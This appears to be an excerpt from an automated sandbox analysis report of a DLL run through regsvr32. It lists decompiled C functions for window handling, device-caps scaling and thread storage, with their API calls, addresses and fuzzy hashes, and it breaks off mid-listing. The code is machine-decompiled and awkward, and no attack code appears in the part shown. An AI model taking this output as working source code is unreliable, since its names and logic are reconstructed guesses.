                                                                        0x10007245
                                                                        0x10007247
                                                                        0x10007328
                                                                        0x00000000
                                                                        0x1000724d
                                                                        0x1000724d
                                                                        0x10007250
                                                                        0x10007254
                                                                        0x10007256
                                                                        0x10007259
                                                                        0x1000725c
                                                                        0x1000726c
                                                                        0x1000726c
                                                                        0x1000726f
                                                                        0x10007271
                                                                        0x10007274
                                                                        0x10007277
                                                                        0x1000727d
                                                                        0x1000727d
                                                                        0x10007280
                                                                        0x10007282
                                                                        0x100072b8
                                                                        0x100072b8
                                                                        0x100072bb
                                                                        0x100072be
                                                                        0x100072c2
                                                                        0x100072c5
                                                                        0x100072ce
                                                                        0x100072d0
                                                                        0x100072d3
                                                                        0x100072fa
                                                                        0x100072fa
                                                                        0x100072d5
                                                                        0x100072de
                                                                        0x100072e6
                                                                        0x100072ec
                                                                        0x100072f0
                                                                        0x100072f3
                                                                        0x100072f6
                                                                        0x100072f6
                                                                        0x100072ff
                                                                        0x10007302
                                                                        0x10007306
                                                                        0x10007307
                                                                        0x10007313
                                                                        0x10007309
                                                                        0x10007309
                                                                        0x1000730c
                                                                        0x1000730c
                                                                        0x10007307
                                                                        0x00000000
                                                                        0x100072c5
                                                                        0x10007284
                                                                        0x10007287
                                                                        0x1000728d
                                                                        0x10007290
                                                                        0x00000000
                                                                        0x10007292
                                                                        0x10007292
                                                                        0x10007295
                                                                        0x10007297
                                                                        0x1000729a
                                                                        0x100072b2
                                                                        0x1000729c
                                                                        0x100072ad
                                                                        0x100072ad
                                                                        0x1000729a
                                                                        0x10007318
                                                                        0x1000731b
                                                                        0x1000731c
                                                                        0x1000731f
                                                                        0x1000731f
                                                                        0x1000727d
                                                                        0x00000000
                                                                        0x10007277

                                                                        APIs
                                                                        • FindResourceA.KERNEL32(?,?,000000F0), ref: 100071E8
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 100071F4
                                                                        • LockResource.KERNEL32(00000000), ref: 10007209
                                                                        • FreeResource.KERNEL32(00000000), ref: 1000723C
                                                                        • GetDlgItem.USER32 ref: 100072E6
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindFreeItemLoadLock
                                                                        • String ID:
                                                                        • API String ID: 996205394-0
                                                                        • Opcode ID: a2403dcbaf47a98d0818dc6bf856e1e017887b1b7f9ace347811d0ac3dce61fc
                                                                        • Instruction ID: 3ddb78cc740fa9bd2d00af88598f625c67c34797d15b04e165b588e19e6e1fdb
                                                                        • Opcode Fuzzy Hash: a2403dcbaf47a98d0818dc6bf856e1e017887b1b7f9ace347811d0ac3dce61fc
                                                                        • Instruction Fuzzy Hash: 37516B35A00209EFEB14CFA5C884A9EBBF5FF44390F508469E80A9B255D734EA41DF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100344F5 Relevance: 7.6, APIs: 5, Instructions: 99keyboardCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E100344F5(void* __ecx, intOrPtr _a8) {
				signed int _v7;
				intOrPtr _v8;
				struct tagRECT _v24;
				void* _t44;
				void* _t48;
				void* _t52;
				void* _t57;
				void* _t64;
				signed int _t67;
				void* _t75;
				void* _t76;
				signed int _t78;

				_t75 = __ecx;
				_v8 = E100202AB(__ecx);
				GetWindowRect( *(__ecx + 0x1c),  &_v24);
				_t67 = GetSystemMetrics(0x21);
				_t78 = GetSystemMetrics(0x20);
				_t76 = E1002204B(_t75);
				if((_v7 & 0x00000010) == 0) {
					L5:
					if(_t76 < 0xa || _t76 > 0x11) {
						if(_t76 != 4) {
							goto L16;
						}
						goto L8;
					} else {
						L8:
						if((_v7 & 0x00000008) == 0) {
							InflateRect( &_v24,  ~_t78,  ~_t67);
							if((_v7 & 0x00000002) == 0) {
								L16:
								return _t76;
							}
							_t44 = _t76 - 4;
							if(_t44 == 0) {
								L21:
								return 0xb + (0 | _a8 - _v24.bottom > 0x00000000) * 4;
							}
							_t48 = _t44 - 9;
							if(_t48 == 0) {
								return (0 | _a8 - _v24.top < 0x00000000) + (0 | _a8 - _v24.top < 0x00000000) + 0xa;
							}
							_t52 = _t48 - 1;
							if(_t52 == 0) {
								return (0 | _a8 - _v24.top < 0x00000000) + 0xb;
							}
							_t57 = _t52;
							if(_t57 == 0) {
								return ((0 | _a8 - _v24.bottom <= 0x00000000) - 0x00000001 & 0x00000005) + 0xa;
							}
							if(_t57 == 1) {
								goto L21;
							}
							goto L16;
						}
						_t64 = 2;
						return _t64;
					}
				}
				if(_t76 == 3) {
					_t76 = 2;
				}
				if(GetKeyState(2) >= 0) {
					goto L5;
				} else {
					return 0;
				}
			}















                                                                        0x100344fe
                                                                        0x10034505
                                                                        0x1003450f
                                                                        0x10034521
                                                                        0x10034527
                                                                        0x10034532
                                                                        0x10034534
                                                                        0x1003454f
                                                                        0x10034552
                                                                        0x1003455c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1003455e
                                                                        0x1003455e
                                                                        0x10034562
                                                                        0x10034573
                                                                        0x1003457d
                                                                        0x10034595
                                                                        0x00000000
                                                                        0x10034595
                                                                        0x10034581
                                                                        0x10034584
                                                                        0x100345d3
                                                                        0x00000000
                                                                        0x100345de
                                                                        0x10034586
                                                                        0x10034589
                                                                        0x00000000
                                                                        0x100345cd
                                                                        0x1003458b
                                                                        0x1003458c
                                                                        0x00000000
                                                                        0x100345bd
                                                                        0x1003458f
                                                                        0x10034590
                                                                        0x00000000
                                                                        0x100345ad
                                                                        0x10034593
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10034593
                                                                        0x10034566
                                                                        0x00000000
                                                                        0x10034566
                                                                        0x10034552
                                                                        0x10034539
                                                                        0x1003453d
                                                                        0x1003453d
                                                                        0x10034549
                                                                        0x00000000
                                                                        0x1003454b
                                                                        0x00000000
                                                                        0x1003454b

                                                                        APIs
                                                                          • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                        • GetWindowRect.USER32 ref: 1003450F
                                                                        • GetSystemMetrics.USER32 ref: 1003451D
                                                                        • GetSystemMetrics.USER32 ref: 10034523
                                                                        • GetKeyState.USER32 ref: 10034540
                                                                        • InflateRect.USER32(?,00000000,00000000), ref: 10034573
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: MetricsRectSystemWindow$InflateLongState
                                                                        • String ID:
                                                                        • API String ID: 2406722796-0
                                                                        • Opcode ID: ca75ff146dd13cf3a9a81e35c2b644f3561e541cec42ef1ad0753529e650aa81
                                                                        • Instruction ID: eebfe8686990ea06ae8873f0c24ea56f3203d68343432915ce32c001f6d4e862
                                                                        • Opcode Fuzzy Hash: ca75ff146dd13cf3a9a81e35c2b644f3561e541cec42ef1ad0753529e650aa81
                                                                        • Instruction Fuzzy Hash: 2A31D63AE0051DEFDB12DBA8C888EAE7BA5EF49291F464416D802DF193CE34F940C650
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10022C99 Relevance: 7.6, APIs: 5, Instructions: 91windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 95%
                                                                        			E10022C99(void* __ebx, intOrPtr __ecx, void* __eflags) {
				void* _t31;
				signed int _t42;
				struct HWND__* _t62;
				void* _t64;
				void* _t69;

				_t69 = __eflags;
				E10011BF0(0x1003a5dc, _t64);
				 *((intOrPtr*)(_t64 - 0x10)) = __ecx;
				E1001FFB4(_t64 - 0x38);
				E10021613(_t64 - 0x88, _t69);
				 *(_t64 - 4) = 0;
				_t62 = GetTopWindow( *(__ecx + 0x1c));
				if(_t62 != 0) {
					do {
						 *(_t64 - 0x6c) = _t62;
						 *(_t64 - 0x34) = GetDlgCtrlID(_t62) & 0x0000ffff;
						_push(_t62);
						 *((intOrPtr*)(_t64 - 0x24)) = _t64 - 0x88;
						if(E10022115() == 0 || E1001FE3C(_t35, 0, 0xbd11ffff, _t64 - 0x38, 0) == 0) {
							if(E1001FE3C( *((intOrPtr*)(_t64 - 0x10)),  *(_t64 - 0x34), 0xffffffff, _t64 - 0x38, 0) == 0) {
								_t46 =  *((intOrPtr*)(_t64 + 0xc));
								if( *((intOrPtr*)(_t64 + 0xc)) != 0) {
									if((SendMessageA( *(_t64 - 0x6c), 0x87, 0, 0) & 0x00000020) == 0) {
										L11:
										_t46 = 0;
									} else {
										_t42 = E100202AB(_t64 - 0x88) & 0x0000000f;
										if(_t42 == 3 || _t42 == 6 || _t42 == 7 || _t42 == 9) {
											goto L11;
										}
									}
								}
								E1001FFDA(_t64 - 0x38,  *((intOrPtr*)(_t64 + 8)), _t46);
							}
						}
						_t62 = GetWindow(_t62, 2);
					} while (_t62 != 0);
				}
				 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
				 *(_t64 - 0x6c) = 0;
				_t31 = E10022977(_t64 - 0x88);
				 *[fs:0x0] =  *((intOrPtr*)(_t64 - 0xc));
				return _t31;
			}








                                                                        0x10022c99
                                                                        0x10022c9e
                                                                        0x10022cad
                                                                        0x10022cb0
                                                                        0x10022cbb
                                                                        0x10022cc5
                                                                        0x10022cce
                                                                        0x10022cd2
                                                                        0x10022cd9
                                                                        0x10022cda
                                                                        0x10022ce6
                                                                        0x10022cef
                                                                        0x10022cf0
                                                                        0x10022cfa
                                                                        0x10022d26
                                                                        0x10022d28
                                                                        0x10022d2d
                                                                        0x10022d42
                                                                        0x10022d66
                                                                        0x10022d66
                                                                        0x10022d44
                                                                        0x10022d4f
                                                                        0x10022d55
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10022d55
                                                                        0x10022d42
                                                                        0x10022d6f
                                                                        0x10022d6f
                                                                        0x10022d26
                                                                        0x10022d7d
                                                                        0x10022d7f
                                                                        0x10022d87
                                                                        0x10022d88
                                                                        0x10022d92
                                                                        0x10022d95
                                                                        0x10022d9f
                                                                        0x10022da7

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CtrlH_prologMessageSend
                                                                        • String ID:
                                                                        • API String ID: 4125289812-0
                                                                        • Opcode ID: 19a7042d3ee7ac9ff937cd3b65bdcc34620a1ee98de378f8268fb43055ccdf2e
                                                                        • Instruction ID: f32dedf2229806a380f5c1e0926675dad0c5831b186d9175a334cabdc35765a6
                                                                        • Opcode Fuzzy Hash: 19a7042d3ee7ac9ff937cd3b65bdcc34620a1ee98de378f8268fb43055ccdf2e
                                                                        • Instruction Fuzzy Hash: 7931D435C00258BECB25DBA4EC84AFDB7B8FF56250F90421AF456E7151DB30AE85CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100316E6 Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E100316E6(void* __ecx, unsigned int _a4) {
				struct HWND__* _t20;
				void* _t23;
				void* _t33;
				void* _t34;
				struct HWND__* _t35;

				_t34 = __ecx;
				if((E100202AB(__ecx) & 0x40000000) == 0) {
					_t33 = E10022AD5(__ecx);
				} else {
					_t33 = __ecx;
				}
				if((_a4 & 0x0000000c) != 0) {
					_t23 = E100203CE(_t33);
					if(( !(_a4 >> 3) & 0x00000001) == 0 || _t23 == 0 || _t33 == _t34) {
						SendMessageA( *(_t33 + 0x1c), 0x86, 0, 0);
					} else {
						 *(_t34 + 0x39) =  *(_t34 + 0x39) | 0x00000002;
						SendMessageA( *(_t33 + 0x1c), 0x86, 1, 0);
						 *(_t34 + 0x39) =  *(_t34 + 0x39) & 0x000000fd;
					}
				}
				_t20 = GetWindow(GetDesktopWindow(), 5);
				while(1) {
					_t35 = _t20;
					if(_t35 == 0) {
						break;
					}
					if(E100310CC( *(_t33 + 0x1c), _t35) != 0) {
						SendMessageA(_t35, 0x36d, _a4, 0);
					}
					_t20 = GetWindow(_t35, 2);
				}
				return _t20;
			}








                                                                        0x100316ea
                                                                        0x100316f6
                                                                        0x10031703
                                                                        0x100316f8
                                                                        0x100316f8
                                                                        0x100316f8
                                                                        0x10031710
                                                                        0x10031714
                                                                        0x10031725
                                                                        0x10031753
                                                                        0x1003172f
                                                                        0x1003172f
                                                                        0x1003173f
                                                                        0x10031741
                                                                        0x10031741
                                                                        0x10031725
                                                                        0x10031784
                                                                        0x10031784
                                                                        0x10031786
                                                                        0x1003178a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10031771
                                                                        0x1003177f
                                                                        0x1003177f
                                                                        0x10031784
                                                                        0x10031784
                                                                        0x10031790

                                                                        APIs
                                                                          • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                        • SendMessageA.USER32 ref: 1003173F
                                                                        • SendMessageA.USER32 ref: 10031753
                                                                        • GetDesktopWindow.USER32 ref: 10031757
                                                                        • SendMessageA.USER32 ref: 1003177F
                                                                        • GetWindow.USER32(00000000), ref: 10031784
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendWindow$DesktopLong
                                                                        • String ID:
                                                                        • API String ID: 2272707703-0
                                                                        • Opcode ID: 73e2593b8f262eaeb4f4e94dd705a49f5985a06933a3941b6edb2e6593d9f2be
                                                                        • Instruction ID: b2d0115702f01622c71e7e90a3c3b5da49a9f5b0f30be2a1795dd18db7154202
                                                                        • Opcode Fuzzy Hash: 73e2593b8f262eaeb4f4e94dd705a49f5985a06933a3941b6edb2e6593d9f2be
                                                                        • Instruction Fuzzy Hash: AC1106312447156BE333CA219C86FDE7ABAEF4AB91F154114F6409E1D2CF91EC418395
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10031E6F Relevance: 7.6, APIs: 5, Instructions: 62windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10031E6F(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, struct HWND__* _a4, unsigned int _a8) {
				intOrPtr _v8;
				char _v268;
				intOrPtr _v272;
				intOrPtr _t20;
				int _t24;
				unsigned int _t45;
				intOrPtr _t52;

				_t20 =  *0x1004c470; // 0x303bb91f
				_v8 = _t20;
				_v272 = __ecx;
				_t52 =  *((intOrPtr*)(E100373B5() + 4));
				if(_t52 != 0 && _a8 != 0) {
					_t45 = _a8 >> 0x10;
					if(_t45 != 0) {
						_t24 =  *(_t52 + 0x8c);
						if(_a8 == _t24 && _t45 ==  *(_t52 + 0x8e)) {
							GlobalGetAtomNameA(_t24,  &_v268, 0x103);
							GlobalAddAtomA( &_v268);
							GlobalGetAtomNameA(0,  &_v268, 0x103);
							GlobalAddAtomA( &_v268);
							SendMessageA(_a4, 0x3e4,  *(_v272 + 0x1c), ( *(_t52 + 0x8e) & 0x0000ffff) << 0x00000010 |  *(_t52 + 0x8c) & 0x0000ffff);
						}
					}
				}
				return E100117AE(0, _v8);
			}










                                                                        0x10031e78
                                                                        0x10031e7e
                                                                        0x10031e81
                                                                        0x10031e8c
                                                                        0x10031e91
                                                                        0x10031ea5
                                                                        0x10031eab
                                                                        0x10031eb1
                                                                        0x10031ebc
                                                                        0x10031edc
                                                                        0x10031eeb
                                                                        0x10031f03
                                                                        0x10031f0c
                                                                        0x10031f33
                                                                        0x10031f3a
                                                                        0x10031ebc
                                                                        0x10031eab
                                                                        0x10031f47

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: AtomGlobal$Name$MessageSend
                                                                        • String ID:
                                                                        • API String ID: 1515195355-0
                                                                        • Opcode ID: 18f948bbb074b7511017b7146c05a941aef01dbd5fd54326c2498a16bdc2d2e7
                                                                        • Instruction ID: 486b4a3070eef5cedf278f6f896eb776bbd2baf7572d0ea587dcdbf0f4b3db2c
                                                                        • Opcode Fuzzy Hash: 18f948bbb074b7511017b7146c05a941aef01dbd5fd54326c2498a16bdc2d2e7
                                                                        • Instruction Fuzzy Hash: 301130759001189EDB51DB65CC90AEAB3F8FF18740F408455E599DB141DBB4AAC1CF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10033E13 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 82%
                                                                        			E10033E13(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t22;
				int _t32;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t22 =  *0x1004efa8; // 0x60
					_t12 =  *0x1004efac; // 0x60
					goto L6;
				} else {
					_t32 = GetMapMode( *(__ecx + 8));
					if(_t32 >= 7 || _t32 == 1) {
						_t22 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, 0x9ec, _t22);
						_t14 = MulDiv(_t36[1], 0x9ec, _v8);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E10028F83(__ecx, _a4);
						_push(_t32);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}









                                                                        0x10033e16
                                                                        0x10033e19
                                                                        0x10033e1e
                                                                        0x10033e6a
                                                                        0x10033e70
                                                                        0x00000000
                                                                        0x10033e20
                                                                        0x10033e29
                                                                        0x10033e2e
                                                                        0x10033e64
                                                                        0x10033e66
                                                                        0x10033e75
                                                                        0x10033e75
                                                                        0x10033e87
                                                                        0x10033e8f
                                                                        0x10033e95
                                                                        0x10033e97
                                                                        0x10033e35
                                                                        0x10033e37
                                                                        0x10033e3b
                                                                        0x10033e43
                                                                        0x10033e4a
                                                                        0x10033e4d
                                                                        0x10033e4d
                                                                        0x10033e2e
                                                                        0x10033e9e

                                                                        APIs
                                                                        • GetMapMode.GDI32(?,?,?,?,?,?,1000A1B6,?,00000000,?,74778B90), ref: 10033E23
                                                                        • GetDeviceCaps.GDI32(?,00000058), ref: 10033E5D
                                                                        • GetDeviceCaps.GDI32(?,0000005A), ref: 10033E66
                                                                          • Part of subcall function 10028F83: MulDiv.KERNEL32(?,00000000,00000000), ref: 10028FC3
                                                                          • Part of subcall function 10028F83: MulDiv.KERNEL32(00000000,00000000,00000000), ref: 10028FE0
                                                                        • MulDiv.KERNEL32(?,000009EC,00000060), ref: 10033E8A
                                                                        • MulDiv.KERNEL32(00000000,000009EC,74778B90), ref: 10033E95
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: CapsDevice$Mode
                                                                        • String ID:
                                                                        • API String ID: 696222070-0
                                                                        • Opcode ID: bc12bf045409c33661820cc2be5f7907c0cdbee5fcc122a38f5508f39634e8b5
                                                                        • Instruction ID: 1735433994fc482824355aeef04517b355e33a0d4513a8ab2ef99d7773c3569a
                                                                        • Opcode Fuzzy Hash: bc12bf045409c33661820cc2be5f7907c0cdbee5fcc122a38f5508f39634e8b5
                                                                        • Instruction Fuzzy Hash: AA11E135600614EFEB229F65CC84C0EBBEAEF89751B118429F9859B3A1C771ED018F90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10033EA1 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 83%
                                                                        			E10033EA1(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t30;
				int _t33;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t30 =  *0x1004efa8; // 0x60
					_t12 =  *0x1004efac; // 0x60
					goto L6;
				} else {
					_t33 = GetMapMode( *(__ecx + 8));
					if(_t33 >= 7 || _t33 == 1) {
						_t30 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, _t30, 0x9ec);
						_t10 =  &(_t36[1]); // 0x4689ec45
						_t14 = MulDiv( *_t10, _v8, 0x9ec);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E10028F1A(__ecx, _a4);
						_push(_t33);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}









                                                                        0x10033ea4
                                                                        0x10033ea7
                                                                        0x10033eac
                                                                        0x10033ef8
                                                                        0x10033efe
                                                                        0x00000000
                                                                        0x10033eae
                                                                        0x10033eb7
                                                                        0x10033ebc
                                                                        0x10033ef2
                                                                        0x10033ef4
                                                                        0x10033f03
                                                                        0x10033f03
                                                                        0x10033f15
                                                                        0x10033f1e
                                                                        0x10033f20
                                                                        0x10033f23
                                                                        0x10033f25
                                                                        0x10033ec3
                                                                        0x10033ec5
                                                                        0x10033ec9
                                                                        0x10033ed1
                                                                        0x10033ed8
                                                                        0x10033edb
                                                                        0x10033edb
                                                                        0x10033ebc
                                                                        0x10033f2c

                                                                        APIs
                                                                        • GetMapMode.GDI32(?,00000000,?,?,?,?,1000A1EA,?), ref: 10033EB1
                                                                        • GetDeviceCaps.GDI32(?,00000058), ref: 10033EEB
                                                                        • GetDeviceCaps.GDI32(?,0000005A), ref: 10033EF4
                                                                          • Part of subcall function 10028F1A: MulDiv.KERNEL32(1000A1EA,00000000,00000000), ref: 10028F5A
                                                                          • Part of subcall function 10028F1A: MulDiv.KERNEL32(4689EC45,00000000,00000000), ref: 10028F77
                                                                        • MulDiv.KERNEL32(1000A1EA,00000060,000009EC), ref: 10033F18
                                                                        • MulDiv.KERNEL32(4689EC45,?,000009EC), ref: 10033F23
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: CapsDevice$Mode
                                                                        • String ID:
                                                                        • API String ID: 696222070-0
                                                                        • Opcode ID: 833bac8d30de56bf327d299826c07e3a3159bd3f9899bf9753b6f554495b0d72
                                                                        • Instruction ID: d9f530c2cd1e86ac66058578f4e3f5f9ceac98c77ead6ae7da37ff5c198008ea
                                                                        • Opcode Fuzzy Hash: 833bac8d30de56bf327d299826c07e3a3159bd3f9899bf9753b6f554495b0d72
                                                                        • Instruction Fuzzy Hash: 6D11C235600614EFE7229F65CC84C0EBBFAEF85752B118429F9859B361C771EC018F90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001519D Relevance: 7.5, APIs: 5, Instructions: 37threadCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 41%
                                                                        			E1001519D(void* __edi) {
				void* __ebx;
				void* __esi;
				long _t5;
				long _t11;
				long _t12;
				long* _t17;

				_t5 = GetLastError();
				_t12 = _t5;
				_t17 =  *0x1004f5e0( *0x1004c848);
				_t18 = _t17;
				if(_t17 == 0) {
					_push(0x8c);
					_push(1);
					_t17 = E1001382A(_t12, __edi, _t17, _t18);
					if(_t17 == 0) {
						L4:
						E10011400(0x10);
					} else {
						_push(_t17);
						_push( *0x1004c848);
						if( *0x1004f5e4() == 0) {
							goto L4;
						} else {
							_t17[0x15] = 0x1004cb00;
							_t17[5] = 1;
							_t11 = GetCurrentThreadId();
							_t17[1] = _t17[1] | 0xffffffff;
							 *_t17 = _t11;
						}
					}
				}
				SetLastError(_t12);
				return _t17;
			}









                                                                        0x1001519f
                                                                        0x100151ab
                                                                        0x100151b3
                                                                        0x100151b5
                                                                        0x100151b7
                                                                        0x100151b9
                                                                        0x100151be
                                                                        0x100151c5
                                                                        0x100151cb
                                                                        0x100151fa
                                                                        0x100151fc
                                                                        0x100151cd
                                                                        0x100151cd
                                                                        0x100151ce
                                                                        0x100151dc
                                                                        0x00000000
                                                                        0x100151de
                                                                        0x100151de
                                                                        0x100151e5
                                                                        0x100151ec
                                                                        0x100151f2
                                                                        0x100151f6
                                                                        0x100151f6
                                                                        0x100151dc
                                                                        0x100151cb
                                                                        0x10015203
                                                                        0x1001520d

                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,00000000,100136FA,100139FA,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010,10015375), ref: 1001519F
